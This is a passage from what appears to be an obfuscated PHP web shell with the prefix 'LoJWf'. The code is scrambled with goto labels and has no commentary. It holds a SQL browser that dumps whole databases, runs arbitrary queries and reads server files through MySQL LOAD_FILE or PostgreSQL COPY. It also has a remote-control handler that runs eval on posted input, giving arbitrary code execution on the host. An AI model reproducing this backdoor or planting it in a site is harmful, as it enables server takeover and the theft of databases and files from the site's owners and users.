2508 goto B2d33;
2509 E7628:
2510 goto b62a1;
2511 goto Ebb56;
2512 D299f:
2513 ef6d5:
2514 goto ff630;
2515 aa9d1:
2516 if (!($i < strLen($p))) {
2517 goto fb4f5;
2518 }
2519 goto d02ae;
2520 d02ae:
2521 $r .= chr(hexdec($p[$i] . $p[$i + 1]));
2522 goto D299f;
2523 F75ab:
2524 b62a1:
2525 goto aa9d1;
2526 ff630:
2527 $i += 2;
2528 goto E7628;
2529 B2d33:
2530 $r = '';
2531 goto b9c0a;
2532 b9c0a:
2533 $i = 0;
2534 goto F75ab;
2535 Ce7c4:
2536 return $r;
2537 goto E98e2;
2538 Ebb56:
2539 fb4f5:
2540 goto Ce7c4;
2541 E98e2:
2542 }
2543 }
2544 goto E20ed;
2545 df676:
2546}
2547goto d7790;
2548b7b56:
2549if ($cwd[strlen($cwd) - 1] != '/') {
2550 $cwd .= '/';
2551}
2552goto F5dac;
2553c80a8:
2554$cwd = @getcwd();
2555goto E15e8;
2556ff494:
2557function actionSql()
2558{
2559 goto d197c;
2560 E90ff:
2561 echo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<td><select name='type'><option value='mysql' ";
2562 goto B63f9;
2563 e3c22:
2564 echo ">PostgreSql</option></select></td>\r\n<td><input type=text name=sql_host value=\"" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "\"></td>\r\n<td><input type=text name=sql_login value=\"" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "\"></td>\r\n<td><input type=text name=sql_pass value=\"" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "\"></td><td>";
2565 goto D6cdb;
2566 A2835:
2567 if (isset($_POST['sql_host'])) {
2568 if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
2569 goto c5fb8;
2570 abea9:
2571 list($key, $value) = each($item);
2572 goto fff1f;
2573 Ea4fb:
2574 echo "<select name=sql_base><option value=''></option>";
2575 goto C0fc8;
2576 C0fc8:
2577 F8457:
2578 goto b7561;
2579 fbf26:
2580 dd5d7:
2581 goto e3919;
2582 b7561:
2583 if (!($item = $db->fetch())) {
2584 goto dd5d7;
2585 }
2586 goto abea9;
2587 fff1f:
2588 echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
2589 goto B5da7;
2590 c4c29:
2591 $db->listDbs();
2592 goto Ea4fb;
2593 e3919:
2594 echo '</select>';
2595 goto fa4df;
2596 c5fb8:
2597 switch ($_POST['charset']) {
2598 case "Windows-1251":
2599 $db->setCharset('cp1251');
2600 goto D89f5;
2601 case "UTF-8":
2602 $db->setCharset('utf8');
2603 goto D89f5;
2604 case "KOI8-R":
2605 $db->setCharset('koi8r');
2606 goto D89f5;
2607 case "KOI8-U":
2608 $db->setCharset('koi8u');
2609 goto D89f5;
2610 case "cp866":
2611 $db->setCharset('cp866');
2612 goto D89f5;
2613 }
2614 goto D842f;
2615 B5da7:
2616 goto F8457;
2617 goto fbf26;
2618 f6a25:
2619 D89f5:
2620 goto c4c29;
2621 D842f:
2622 D4a28:
2623 goto f6a25;
2624 fa4df:
2625 } else {
2626 echo $tmp;
2627 }
2628 } else {
2629 echo $tmp;
2630 }
2631 goto ddc8e;
2632 f8ae3:
2633 echo '</div>';
2634 goto F1650;
2635 D6cdb:
2636 $tmp = "<input type=text name=sql_base value=''>";
2637 goto A2835;
2638 C3c15:
2639 if (@$_POST['type'] == 'pgsql') {
2640 echo 'selected';
2641 }
2642 goto e3c22;
2643 F1650:
2644 LoJWfFooter();
2645 goto bd9be;
2646 d197c:
2647 class DbClass
2648 {
2649 var $type;
2650 var $link;
2651 var $res;
2652 function __construct($type)
2653 {
2654 $this->type = $type;
2655 }
2656 function connect($host, $user, $pass, $dbname)
2657 {
2658 goto B4237;
2659 F2d8c:
2660 Bbcd1:
2661 goto E6d32;
2662 B4237:
2663 switch ($this->type) {
2664 case 'mysql':
2665 if ($this->link = @mysql_connect($host, $user, $pass, true)) {
2666 return true;
2667 }
2668 goto ef5d5;
2669 case 'pgsql':
2670 goto cf29c;
2671 B2352:
2672 if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) {
2673 return true;
2674 }
2675 goto b5302;
2676 cf29c:
2677 $host = explode(':', $host);
2678 goto Cdf44;
2679 Cdf44:
2680 if (!$host[1]) {
2681 $host[1] = 5432;
2682 }
2683 goto B2352;
2684 b5302:
2685 goto ef5d5;
2686 goto ab4d3;
2687 ab4d3:
2688 }
2689 goto F2d8c;
2690 E6d32:
2691 ef5d5:
2692 goto c1f02;
2693 c1f02:
2694 return false;
2695 goto C9390;
2696 C9390:
2697 }
2698 function selectdb($db)
2699 {
2700 goto e9f8e;
2701 fd0dc:
2702 b2d0a:
2703 goto d57e6;
2704 d57e6:
2705 return false;
2706 goto F627d;
2707 e9f8e:
2708 switch ($this->type) {
2709 case 'mysql':
2710 if (@mysql_select_db($db)) {
2711 return true;
2712 }
2713 goto b2d0a;
2714 }
2715 goto B4180;
2716 B4180:
2717 e28d6:
2718 goto fd0dc;
2719 F627d:
2720 }
2721 function query($str)
2722 {
2723 goto A0686;
2724 e4ae5:
2725 return false;
2726 goto C9569;
2727 d9a0c:
2728 dfe48:
2729 goto b69ad;
2730 A0686:
2731 switch ($this->type) {
2732 case 'mysql':
2733 return $this->res = @mysql_query($str);
2734 goto a160e;
2735 case 'pgsql':
2736 return $this->res = @pg_query($this->link, $str);
2737 goto a160e;
2738 }
2739 goto d9a0c;
2740 b69ad:
2741 a160e:
2742 goto e4ae5;
2743 C9569:
2744 }
2745 function fetch()
2746 {
2747 goto D7692;
2748 d3807:
2749 Dc1d2:
2750 goto De655;
2751 De655:
2752 return false;
2753 goto c607c;
2754 Dc3da:
2755 switch ($this->type) {
2756 case 'mysql':
2757 return @mysql_fetch_assoc($res);
2758 goto Dc1d2;
2759 case 'pgsql':
2760 return @pg_fetch_assoc($res);
2761 goto Dc1d2;
2762 }
2763 goto B79fa;
2764 B79fa:
2765 cdc3d:
2766 goto d3807;
2767 D7692:
2768 $res = func_num_args() ? func_get_arg(0) : $this->res;
2769 goto Dc3da;
2770 c607c:
2771 }
2772 function listDbs()
2773 {
2774 goto De0b0;
2775 cadb0:
2776 return false;
2777 goto ba110;
2778 C0e9a:
2779 E0456:
2780 goto C52b1;
2781 De0b0:
2782 switch ($this->type) {
2783 case 'mysql':
2784 return $this->query("SHOW databases");
2785 goto e8b41;
2786 case 'pgsql':
2787 return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
2788 goto e8b41;
2789 }
2790 goto C0e9a;
2791 C52b1:
2792 e8b41:
2793 goto cadb0;
2794 ba110:
2795 }
2796 function listTables()
2797 {
2798 goto Ce4f3;
2799 Ce4f3:
2800 switch ($this->type) {
2801 case 'mysql':
2802 return $this->res = $this->query('SHOW TABLES');
2803 goto e6434;
2804 case 'pgsql':
2805 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
2806 goto e6434;
2807 }
2808 goto Bff0a;
2809 c8453:
2810 e6434:
2811 goto F5687;
2812 Bff0a:
2813 f261b:
2814 goto c8453;
2815 F5687:
2816 return false;
2817 goto Dbe47;
2818 Dbe47:
2819 }
2820 function error()
2821 {
2822 goto dc6da;
2823 fc591:
2824 Edbde:
2825 goto C78d5;
2826 dc6da:
2827 switch ($this->type) {
2828 case 'mysql':
2829 return @mysql_error();
2830 goto ebc4b;
2831 case 'pgsql':
2832 return @pg_last_error();
2833 goto ebc4b;
2834 }
2835 goto fc591;
2836 C78d5:
2837 ebc4b:
2838 goto A24f6;
2839 A24f6:
2840 return false;
2841 goto F70a1;
2842 F70a1:
2843 }
2844 function setCharset($str)
2845 {
2846 goto Bc292;
2847 Bc292:
2848 switch ($this->type) {
2849 case 'mysql':
2850 if (function_exists('mysql_set_charset')) {
2851 return @mysql_set_charset($str, $this->link);
2852 } else {
2853 $this->query('SET CHARSET ' . $str);
2854 }
2855 goto F9f7b;
2856 case 'pgsql':
2857 return @pg_set_client_encoding($this->link, $str);
2858 goto F9f7b;
2859 }
2860 goto E227f;
2861 aa7d7:
2862 F9f7b:
2863 goto A94cc;
2864 A94cc:
2865 return false;
2866 goto B510c;
2867 E227f:
2868 Ca53d:
2869 goto aa7d7;
2870 B510c:
2871 }
2872 function loadFile($str)
2873 {
2874 goto e4ee2;
2875 Bed75:
2876 c3b85:
2877 goto e90dc;
2878 e4ee2:
2879 switch ($this->type) {
2880 case 'mysql':
2881 return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file"));
2882 goto De2b7;
2883 case 'pgsql':
2884 goto b6d82;
2885 dc08c:
2886 $r = array();
2887 goto d9220;
2888 b88cc:
2889 goto C0add;
2890 goto adcb7;
2891 acd2f:
2892 if (!($i = $this->fetch())) {
2893 goto C2f7a;
2894 }
2895 goto C691f;
2896 C691f:
2897 $r[] = $i['file'];
2898 goto b88cc;
2899 f616f:
2900 goto De2b7;
2901 goto ef334;
2902 B16d0:
2903 return array('file' => implode("\n", $r));
2904 goto f616f;
2905 d9220:
2906 C0add:
2907 goto acd2f;
2908 b6d82:
2909 $this->query("CREATE TABLE LoJWf2(file text);COPY LoJWf2 FROM '" . addslashes($str) . "';select file from LoJWf2;");
2910 goto dc08c;
2911 adcb7:
2912 C2f7a:
2913 goto E9160;
2914 E9160:
2915 $this->query('drop table LoJWf2');
2916 goto B16d0;
2917 ef334:
2918 }
2919 goto Bed75;
2920 A5012:
2921 return false;
2922 goto F9023;
2923 e90dc:
2924 De2b7:
2925 goto A5012;
2926 F9023:
2927 }
2928 function dump($table, $fp = false)
2929 {
2930 goto d946a;
2931 E05ca:
2932 return false;
2933 goto c6cbe;
2934 d946a:
2935 switch ($this->type) {
2936 case 'mysql':
2937 goto e8043;
2938 df733:
2939 cd95c:
2940 goto fcefd;
2941 Ff1d0:
2942 if ($i % 1000 == 0) {
2943 $head = true;
2944 $sql = ";\n\n";
2945 }
2946 goto A3bae;
2947 c08db:
2948 $this->query('SELECT * FROM `' . $table . '`');
2949 goto a1b4b;
2950 Ff11e:
2951 $i++;
2952 goto f4ea0;
2953 Aa31b:
2954 goto d4725;
2955 goto a8e24;
2956 D0121:
2957 $create = mysql_fetch_array($res);
2958 goto a8f3b;
2959 fd5c5:
2960 Bf333:
2961 goto caf8f;
2962 e8043:
2963 $res = $this->query('SHOW CREATE TABLE `' . $table . '`');
2964 goto D0121;
2965 A3bae:
2966 $columns = array();
2967 goto C06f3;
2968 B7437:
2969 $sql = '';
2970 goto Ff1d0;
2971 C06f3:
2972 foreach ($item as $k => $v) {
2973 goto e739e;
2974 f80da:
2975 e0e68:
2976 goto B1a5e;
2977 e739e:
2978 if ($v === null) {
2979 $item[$k] = "NULL";
2980 } elseif (is_int($v)) {
2981 $item[$k] = $v;
2982 } else {
2983 $item[$k] = "'" . @mysql_real_escape_string($v) . "'";
2984 }
2985 goto A9d85;
2986 A9d85:
2987 $columns[] = "`" . $k . "`";
2988 goto f80da;
2989 B1a5e:
2990 }
2991 goto a3c4f;
2992 a1b4b:
2993 $i = 0;
2994 goto Ac377;
2995 fcefd:
2996 if (!$head) {
2997 if ($fp) {
2998 fwrite($fp, ";\n\n");
2999 } else {
3000 echo ";\n\n";
3001 }
3002 }
3003 goto Aa31b;
3004 C150d:
3005 if ($head) {
3006 $sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')';
3007 $head = false;
3008 } else {
3009 $sql .= "\n\t,(" . implode(", ", $item) . ')';
3010 }
3011 goto Fb0cc;
3012 a3c4f:
3013 e206b:
3014 goto C150d;
3015 Fb0cc:
3016 if ($fp) {
3017 fwrite($fp, $sql);
3018 } else {
3019 echo $sql;
3020 }
3021 goto Ff11e;
3022 Ac377:
3023 $head = true;
3024 goto fd5c5;
3025 f4ea0:
3026 goto Bf333;
3027 goto df733;
3028 F4cda:
3029 if ($fp) {
3030 fwrite($fp, $sql);
3031 } else {
3032 echo $sql;
3033 }
3034 goto c08db;
3035 a8f3b:
3036 $sql = $create[1] . ";\n";
3037 goto F4cda;
3038 caf8f:
3039 if (!($item = $this->fetch())) {
3040 goto cd95c;
3041 }
3042 goto B7437;
3043 a8e24:
3044 case 'pgsql':
3045 goto Ed571;
3046 Efb37:
3047 goto d4725;
3048 goto f18ef;
3049 E93ff:
3050 Fc77a:
3051 goto Efb37;
3052 Aece4:
3053 goto B32ea;
3054 goto E93ff;
3055 F522b:
3056 foreach ($item as $k => $v) {
3057 goto eff69;
3058 eff69:
3059 $item[$k] = "'" . addslashes($v) . "'";
3060 goto E412e;
3061 E61b1:
3062 B5b74:
3063 goto C2238;
3064 E412e:
3065 $columns[] = $k;
3066 goto E61b1;
3067 C2238:
3068 }
3069 goto A592b;
3070 cfbe5:
3071 if (!($item = $this->fetch())) {
3072 goto Fc77a;
3073 }
3074 goto ebf3a;
3075 fad9f:
3076 if ($fp) {
3077 fwrite($fp, $sql);
3078 } else {
3079 echo $sql;
3080 }
3081 goto Aece4;
3082 e0c27:
3083 B32ea:
3084 goto cfbe5;
3085 ebf3a:
3086 $columns = array();
3087 goto F522b;
3088 F8812:
3089 $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n";
3090 goto fad9f;
3091 A592b:
3092 d5f77:
3093 goto F8812;
3094 Ed571:
3095 $this->query('SELECT * FROM ' . $table);
3096 goto e0c27;
3097 f18ef:
3098 }
3099 goto Bf684;
3100 Bf684:
3101 fe2d1:
3102 goto cb73b;
3103 cb73b:
3104 d4725:
3105 goto E05ca;
3106 c6cbe:
3107 }
3108 }
3109 goto D9f72;
3110 d6f0a:
3111 if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') {
3112 goto e4c5e;
3113 e4c5e:
3114 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
3115 goto d9447;
3116 E4869:
3117 a802d:
3118 goto Cb7df;
3119 d9447:
3120 $db->selectdb($_POST['sql_base']);
3121 goto ee24d;
3122 Cb7df:
3123 d72a6:
3124 goto b9161;
3125 ee24d:
3126 switch ($_POST['charset']) {
3127 case "Windows-1251":
3128 $db->setCharset('cp1251');
3129 goto d72a6;
3130 case "UTF-8":
3131 $db->setCharset('utf8');
3132 goto d72a6;
3133 case "KOI8-R":
3134 $db->setCharset('koi8r');
3135 goto d72a6;
3136 case "KOI8-U":
3137 $db->setCharset('koi8u');
3138 goto d72a6;
3139 case "cp866":
3140 $db->setCharset('cp866');
3141 goto d72a6;
3142 }
3143 goto E4869;
3144 b9161:
3145 if (empty($_POST['file'])) {
3146 goto d9ad1;
3147 A69ca:
3148 header("Content-Disposition: attachment; filename=dump.sql");
3149 goto c9098;
3150 f1535:
3151 foreach ($_POST['tbl'] as $v) {
3152 $db->dump($v);
3153 a3df7:
3154 }
3155 goto a694f;
3156 d9ad1:
3157 ob_start("ob_gzhandler", 4096);
3158 goto A69ca;
3159 c9098:
3160 header("Content-Type: text/plain");
3161 goto f1535;
3162 E9655:
3163 exit;
3164 goto b88ef;
3165 a694f:
3166 A56bc:
3167 goto E9655;
3168 b88ef:
3169 } elseif ($fp = @fopen($_POST['file'], 'w')) {
3170 goto b2320;
3171 a28f1:
3172 unset($_POST['p2']);
3173 goto b4d51;
3174 b2320:
3175 foreach ($_POST['tbl'] as $v) {
3176 $db->dump($v, $fp);
3177 C3579:
3178 }
3179 goto D6cb9;
3180 Df1b3:
3181 fclose($fp);
3182 goto a28f1;
3183 D6cb9:
3184 D1705:
3185 goto Df1b3;
3186 b4d51:
3187 } else {
3188 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
3189 }
3190 goto daf1e;
3191 daf1e:
3192 }
3193 goto Ef56f;
3194 D9f72:
3195 $db = new DbClass($_POST['type']);
3196 goto d6f0a;
3197 cb792:
3198 echo ">MySql</option><option value='pgsql' ";
3199 goto C3c15;
3200 Cb9a1:
3201 if (isset($db) && $db->link) {
3202 goto Df3d4;
3203 Aa222:
3204 if (@$_POST['p1'] == 'loadfile') {
3205 $file = $db->loadFile($_POST['p2']);
3206 echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
3207 }
3208 goto C52f9;
3209 dd59a:
3210 if ($_POST['type'] == 'mysql') {
3211 $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
3212 if ($db->fetch()) {
3213 echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
3214 }
3215 }
3216 goto Aa222;
3217 A3b71:
3218 if (!empty($_POST['sql_base'])) {
3219 goto F5fac;
3220 c0467:
3221 list($key, $value) = each($item);
3222 goto fc603;
3223 E47b8:
3224 D72f2:
3225 goto Ffb46;
3226 D59d5:
3227 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
3228 goto fc7bf;
3229 a6475:
3230 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
3231 goto B83df;
3232 fc603:
3233 if (!empty($_POST['sql_count'])) {
3234 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
3235 }
3236 goto Ed8be;
3237 B83df:
3238 if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') {
3239 echo htmlspecialchars($_POST['p2']);
3240 }
3241 goto cf9c7;
3242 caa2a:
3243 e37fa:
3244 goto c3d63;
3245 c3d63:
3246 if (!($item = $db->fetch($tbls_res))) {
3247 goto D72f2;
3248 }
3249 goto c0467;
3250 b0561:
3251 echo "</td></tr>";
3252 goto C9597;
3253 fc7bf:
3254 $tbls_res = $db->listTables();
3255 goto caa2a;
3256 F5fac:
3257 $db->selectdb($_POST['sql_base']);
3258 goto D59d5;
3259 C979b:
3260 echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>";
3261 goto d40cc;
3262 Ed8be:
3263 $value = htmlspecialchars($value);
3264 goto C979b;
3265 Fd4bb:
3266 if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) {
3267 $db->query(@$_POST['p2']);
3268 if ($db->res !== false) {
3269 goto D0568;
3270 B14bd:
3271 foreach ($item as $key => $value) {
3272 if ($value == null) {
3273 echo '<td><i>null</i></td>';
3274 } else {
3275 echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
3276 }
3277 Ac933:
3278 }
3279 goto A4d2b;
3280 caa57:
3281 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
3282 goto E94c5;
3283 eedaa:
3284 if (!($item = $db->fetch())) {
3285 goto C6582;
3286 }
3287 goto fd238;
3288 D0568:
3289 $title = false;
3290 goto caa57;
3291 ab2c2:
3292 $line = $line == 1 ? 2 : 1;
3293 goto B14bd;
3294 A110b:
3295 echo '<tr class="l' . $line . '">';
3296 goto ab2c2;
3297 E94c5:
3298 $line = 1;
3299 goto ddf12;
3300 fd238:
3301 if (!$title) {
3302 goto B4b9d;
3303 b5d8f:
3304 d552e:
3305 goto Dc9eb;
3306 B4b9d:
3307 echo '<tr>';
3308 goto eec16;
3309 bd17d:
3310 $line = 2;
3311 goto A1708;
3312 ec403:
3313 $title = true;
3314 goto Bab93;
3315 eec16:
3316 foreach ($item as $key => $value) {
3317 echo '<th>' . $key . '</th>';
3318 e5eeb:
3319 }
3320 goto b5d8f;
3321 Dc9eb:
3322 reset($item);
3323 goto ec403;
3324 Bab93:
3325 echo '</tr><tr>';
3326 goto bd17d;
3327 A1708:
3328 }
3329 goto A110b;
3330 B92c2:
3331 echo '</table>';
3332 goto f7541;
3333 e3332:
3334 echo '</tr>';
3335 goto ab7b8;
3336 ab7b8:
3337 goto d3fa6;
3338 goto f3b6e;
3339 A4d2b:
3340 acfd9:
3341 goto e3332;
3342 ddf12:
3343 d3fa6:
3344 goto eedaa;
3345 f3b6e:
3346 C6582:
3347 goto B92c2;
3348 f7541:
3349 } else {
3350 echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
3351 }
3352 }
3353 goto a6475;
3354 d40cc:
3355 goto e37fa;
3356 goto E47b8;
3357 Fa85d:
3358 if (@$_POST['p1'] == 'select') {
3359 goto a67a7;
3360 f3582:
3361 $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
3362 goto D76eb;
3363 B0879:
3364 if ($_POST['p3'] > 1) {
3365 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>";
3366 }
3367 goto Dc97a;
3368 c73b5:
3369 $num = $db->fetch();
3370 goto b695c;
3371 D0d18:
3372 if ($_POST['type'] == 'pgsql') {
3373 $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30;
3374 } else {
3375 $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30';
3376 }
3377 goto E37f2;
3378 Ea37b:
3379 $_POST['p3']--;
3380 goto D0d18;
3381 b695c:
3382 $pages = ceil($num['n'] / 30);
3383 goto E4f3b;
3384 E37f2:
3385 echo "<br><br>";
3386 goto e8a7d;
3387 E4f3b:
3388 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">";
3389 goto Fe8ba;
3390 D76eb:
3391 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
3392 goto c73b5;
3393 Dc97a:
3394 if ($_POST['p3'] < $pages) {
3395 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>";
3396 }
3397 goto Ea37b;
3398 a67a7:
3399 $_POST['p1'] = 'query';
3400 goto f3582;
3401 Fe8ba:
3402 echo " of {$pages}";
3403 goto B0879;
3404 e8a7d:
3405 }
3406 goto Fd4bb;
3407 Ffb46:
3408 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
3409 goto Fa85d;
3410 cf9c7:
3411 echo "</textarea><br/><input type=submit value='Execute'>";
3412 goto b0561;
3413 C9597:
3414 }
3415 goto e7f42;
3416 Df3d4:
3417 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
3418 goto A3b71;
3419 e7f42:
3420 echo "</table></form><br/>";
3421 goto dd59a;
3422 C52f9:
3423 } else {
3424 echo htmlspecialchars($db->error());
3425 }
3426 goto f8ae3;
3427 Ef56f:
3428 LoJWfHeader();
3429 goto E90ff;
3430 ddc8e:
3431 echo "</td>\r\n\t\t\t\t<td><input type=submit value='>>' onclick='fs(d.sf);'></td>\r\n <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>\r\n\t\t\t</tr>\r\n\t\t</table>\r\n\t\t<script>\r\n s_db='" . @addslashes($_POST['sql_base']) . "';\r\n function fs(f) {\r\n if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\r\n if(f.p1) f.p1.value='';\r\n if(f.p2) f.p2.value='';\r\n if(f.p3) f.p3.value='';\r\n }\r\n }\r\n\t\t\tfunction st(t,l) {\r\n\t\t\t\td.sf.p1.value = 'select';\r\n\t\t\t\td.sf.p2.value = t;\r\n if(l && d.sf.p3) d.sf.p3.value = l;\r\n\t\t\t\td.sf.submit();\r\n\t\t\t}\r\n\t\t\tfunction is() {\r\n\t\t\t\tfor(i=0;i<d.sf.elements['tbl[]'].length;++i)\r\n\t\t\t\t\td.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\r\n\t\t\t}\r\n\t\t</script>";
3432 goto Cb9a1;
3433 B63f9:
3434 if (@$_POST['type'] == 'mysql') {
3435 echo 'selected';
3436 }
3437 goto cb792;
3438 bd9be:
3439}
3440goto A379f;
3441E6855:
3442function actionRC()
3443{
3444 if (!@$_POST['p1']) {
3445 $a = array("uname" => php_uname(), "php_version" => phpversion(), "LoJWf_version" => LoJWf_VERSION, "safemode" => @ini_get('safe_mode'));
3446 echo serialize($a);
3447 } else {
3448 eval($_POST['p1']);
3449 }
3450}
3451goto e8346;
3452Abb8b:
3453if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) {
3454 function posix_getpwuid($p)
3455 {
3456 return false;
3457 }
3458}
3459goto beac0;
3460e6160:
3461@ini_set('max_execution_time', 0);
3462goto d35bc;
3463Fd70f:
3464exit;
3465